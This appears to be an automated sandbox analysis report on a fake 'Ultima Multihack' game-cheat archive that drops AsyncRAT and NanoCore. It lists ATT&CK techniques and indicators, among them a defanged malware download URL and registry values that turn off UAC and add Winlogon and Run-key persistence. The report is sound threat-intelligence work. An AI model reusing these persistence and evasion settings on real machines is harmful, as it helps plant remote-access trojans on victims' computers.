asyncrat | hxxps://github[.]com/doodoofart3443/ZM-ULTI/raw/refs/heads/main/Ultima%20Multihack%20V3[.]55[.]rar

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	VLC1.EXE

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore

UAC bypass 3 TTPs 3 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x001b00000002b449-958.dat	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
375	1168	powershell.exe
376	1168	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 25 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5268	powershell.exe
2520	powershell.exe
6612	powershell.exe
5888	powershell.exe
4992	powershell.exe
6412	powershell.exe
3684	powershell.exe
5284	powershell.exe
3320	powershell.exe
4500	powershell.exe
6972	powershell.exe
4192	powershell.exe
6232	powershell.exe
6328	powershell.exe
6724	powershell.exe
6228	powershell.exe
6344	powershell.exe
1168	powershell.exe
2196	powershell.exe
1096	powershell.exe
2264	powershell.exe
5372	powershell.exe
2056	powershell.exe
4712	powershell.exe
5244	powershell.exe

Disables Task Manager via registry modification
defense_evasion

Download via BitsAdmin 1 TTPs 4 IoCs

dropper

BITS Jobs

T1197

pid	Process
5856	bitsadmin.exe
4976	bitsadmin.exe
1084	bitsadmin.exe
4684	bitsadmin.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
860	netsh.exe
6260	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
4140	attrib.exe
5256	attrib.exe

Executes dropped EXE 52 IoCs

pid	Process
1164	Ultima Multihack V3.55.exe
1264	file5.exe
5072	ULTIME MULTIHACK REBORN.EXE
668	VLC1.EXE
2840	WINDOWS DEFENDER.EXE
2000	WINDOWS SECURITY NANO.EXE
5652	msdcsc.exe
5968	msdcsc.exe
1876	msdcsc.exe
2748	csrss.exe
4044	msdcsc.exe
2284	msdcsc.exe
1084	msdcsc.exe
2076	msdcsc.exe
4192	msdcsc.exe
3108	msdcsc.exe
4192	msdcsc.exe
880	msdcsc.exe
5536	msdcsc.exe
2400	msdcsc.exe
1096	msdcsc.exe
776	msdcsc.exe
4404	msdcsc.exe
2056	msdcsc.exe
5944	msdcsc.exe
644	msdcsc.exe
3684	msdcsc.exe
7028	msdcsc.exe
7120	msdcsc.exe
4708	msdcsc.exe
3464	msdcsc.exe
3792	msdcsc.exe
6788	msdcsc.exe
6836	msdcsc.exe
7112	msdcsc.exe
684	msdcsc.exe
5444	msdcsc.exe
6308	msdcsc.exe
5732	msdcsc.exe
5068	msdcsc.exe
5832	msdcsc.exe
1872	msdcsc.exe
4648	msdcsc.exe
3316	msdcsc.exe
6080	msdcsc.exe
6768	msdcsc.exe
1076	msdcsc.exe
6632	msdcsc.exe
3896	msdcsc.exe
7108	msdcsc.exe
6116	msdcsc.exe
4768	msdcsc.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	VLC1.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Subsystem = "C:\\Program Files (x86)\\TCP Subsystem\\tcpss.exe"	WINDOWS SECURITY NANO.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WINDOWS SECURITY NANO.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
408	raw.githubusercontent.com
1	raw.githubusercontent.com
4	raw.githubusercontent.com
248	raw.githubusercontent.com
376	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpE826.tmp.png"	csrss.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001b00000002b448-948.dat	upx
behavioral1/memory/668-970-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-980-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5968-986-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/1876-987-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/668-990-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1004-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4044-1006-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4044-1008-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1029-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/2284-1031-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1044-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/1084-1045-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/1084-1047-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1049-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/2076-1051-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4192-1057-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/3108-1060-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4192-1063-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1074-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/880-1076-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1092-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5536-1093-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/2400-1097-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/1096-1099-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/776-1106-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1147-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4404-1149-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1190-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/2056-1192-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1215-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5944-1269-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1475-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/644-1479-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1622-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/3684-1626-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-1721-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/7028-1746-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/7028-1761-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/7120-1971-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/7120-1973-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2051-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4708-2053-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/3464-2076-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2498-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/3792-2509-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2611-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/6788-2631-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/6788-2633-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2636-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/6836-2638-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2639-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/7112-2640-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/684-2643-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5444-2645-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/6308-2647-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2748-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5732-2758-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5068-2759-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-2971-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5832-2993-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/5652-3035-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/1872-3037-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral1/memory/4648-3038-0x0000000000400000-0x00000000004B7000-memory.dmp	upx

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE	file5.exe
File created	C:\Program Files (x86)\VLC1.EXE	file5.exe
File created	C:\Program Files (x86)\WINDOWS DEFENDER.EXE	file5.exe
File created	C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE	file5.exe
File created	C:\Program Files (x86)\TCP Subsystem\tcpss.exe	WINDOWS SECURITY NANO.EXE
File opened for modification	C:\Program Files (x86)\TCP Subsystem\tcpss.exe	WINDOWS SECURITY NANO.EXE
File opened for modification	C:\Program Files (x86)\VLC1.EXE	attrib.exe

Drops file in Windows directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\deny_domains.list	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\deny_full_domains.list	msedge.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp\chrome_installer.log	setup.exe
File opened for modification	C:\Windows\SystemTemp\chrome_installer.log	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\LICENSE	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\sets.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\manifest.fingerprint	msedge.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\_metadata\verified_contents.json	msedge.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\deny_etld1_domains.list	msedge.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

persistence privilege_escalation

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINDOWS DEFENDER.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VLC1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msdcsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks processor information in registry 2 TTPs 30 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 64 IoCs

pid	Process
5688	timeout.exe
5164	timeout.exe
5332	timeout.exe
4368	timeout.exe
5224	timeout.exe
1632	timeout.exe
1620	timeout.exe
1940	timeout.exe
5312	timeout.exe
2056	timeout.exe
3928	timeout.exe
1468	timeout.exe
5312	timeout.exe
3328	timeout.exe
1816	timeout.exe
4468	timeout.exe
1580	timeout.exe
5944	timeout.exe
1132	timeout.exe
5992	timeout.exe
4260	timeout.exe
4572	timeout.exe
5744	timeout.exe
552	timeout.exe
5456	timeout.exe
5320	timeout.exe
3108	timeout.exe
2072	timeout.exe
1468	timeout.exe
3328	timeout.exe
3108	timeout.exe
2992	timeout.exe
4128	timeout.exe
1880	timeout.exe
1264	timeout.exe
5920	timeout.exe
4424	timeout.exe
2340	timeout.exe
6036	timeout.exe
5224	timeout.exe
5640	timeout.exe
2924	timeout.exe
1588	timeout.exe
5688	timeout.exe
2212	timeout.exe
2196	timeout.exe
1100	timeout.exe
4580	timeout.exe
2812	timeout.exe
5256	timeout.exe
4724	timeout.exe
1264	timeout.exe
4368	timeout.exe
6080	timeout.exe
3048	timeout.exe
4920	timeout.exe
4656	timeout.exe
5856	timeout.exe
1984	timeout.exe
6032	timeout.exe
5284	timeout.exe
2040	timeout.exe
1128	timeout.exe
3144	timeout.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
